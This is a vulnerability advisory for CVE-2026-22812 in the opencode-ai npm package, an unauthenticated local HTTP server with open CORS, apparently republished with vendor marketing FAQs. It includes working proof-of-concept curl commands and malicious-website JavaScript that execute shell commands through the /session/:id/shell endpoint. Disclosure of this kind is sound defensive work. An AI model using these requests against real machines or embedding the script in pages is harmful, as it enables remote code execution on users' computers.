Summary
Previously reported via email to [email protected] on 2025-11-17 per the security policy in opencode-sdk-js/SECURITY.md. No response received.
OpenCode automatically starts an unauthenticated HTTP server that allows any local process, or any website via permissive CORS, to execute arbitrary shell commands with the user's privileges.
Details
When OpenCode starts, it spawns an HTTP server (default port 4096+) with no authentication. Critical endpoints exposed:
POST /session/:id/shell- Execute shell commands (server.ts:1401)POST /pty- Create interactive terminal sessions (server.ts:267)GET /file/content?path=- Read arbitrary files (server.ts:1868)
The server is started automatically in cli/cmd/tui/worker.ts:36 via Server.listen().
No authentication middleware exists in server/server.ts. The server uses permissive CORS (.use(cors()) with default Access-Control-Allow-Origin: *), enabling browser-based exploitation.
PoC
Local exploitation:
API="http://127.0.0.1:4096" # update with actual port
SESSION_ID=$(curl -s -X POST "$API/session" -H "Content-Type: application/json" -d '{}' | jq -r '.id')
curl -s -X POST "$API/session/$SESSION_ID/shell" -H "Content-Type: application/json" \
-d '{"agent": "build", "command": "echo PWNED > /tmp/pwned.txt"}'
cat /tmp/pwned.txt # outputs: PWNED
Browser-based exploitation:
A malicious website can exploit visitors who have OpenCode running. Confirmed working in Firefox. PoC available upon request.
// Malicious website JavaScript
fetch('http://127.0.0.1:4096/session', {
method: 'POST',
headers: {'Content-Type': 'application/json'},
body: '{}'
})
.then(r => r.json())
.then(session => {
fetch(`http://127.0.0.1:4096/session/${session.id}/shell`, {
method: 'POST',
headers: {'Content-Type': 'application/json'},
body: JSON.stringify({agent: 'build', command: 'id > /tmp/pwned.txt'})
});
});
Note: Chrome 142+ may prompt for Local Network Access permission. Firefox does not.
Impact
Remote Code Execution via two vectors:
Local process: Any malicious npm package, script, or compromised application can execute commands as the user running OpenCode.
Browser-based (confirmed in Firefox): Any website can execute commands on visitors who have OpenCode running. This enables drive-by attacks via malicious ads, compromised websites, or phishing pages.
With --mdns flag, the server binds to 0.0.0.0 and advertises via Bonjour, extending the attack surface to the entire local network.
Code analysis, CVSS scoring, and documentation assisted by Claude AI (Opus 4.5). Vulnerability verification and PoC testing performed by the reporter.
A critical operation is accessible without requiring any authentication. Typical impact: any user can invoke the privileged function.
CVE-2026-22812 has a CVSS score of 8.8 (High). The vector is network-reachable, no privileges required, and user interaction required. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. A fixed version is available (1.0.216); upgrading removes the vulnerable code path.
Affected versions
Security releases
Kodem intelligence
Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.
Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.
Remediation advice
Kodem Kai can prioritize this vulnerability in your dependency tree and generate a fix recommendation.
Frequently Asked Questions
- What is CVE-2026-22812? CVE-2026-22812 is a high-severity missing authentication for critical function vulnerability in opencode-ai (npm), affecting versions < 1.0.216. It is fixed in 1.0.216. A critical operation is accessible without requiring any authentication.
- How severe is CVE-2026-22812? CVE-2026-22812 has a CVSS score of 8.8 (High). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
- Which versions of opencode-ai are affected by CVE-2026-22812? opencode-ai (npm) versions < 1.0.216 is affected.
- Is there a fix for CVE-2026-22812? Yes. CVE-2026-22812 is fixed in 1.0.216. Upgrade to this version or later.
- Is CVE-2026-22812 exploitable, and should I be worried? Whether CVE-2026-22812 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
- What actually determines whether CVE-2026-22812 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
- How do I fix CVE-2026-22812? Upgrade
opencode-aito 1.0.216 or later.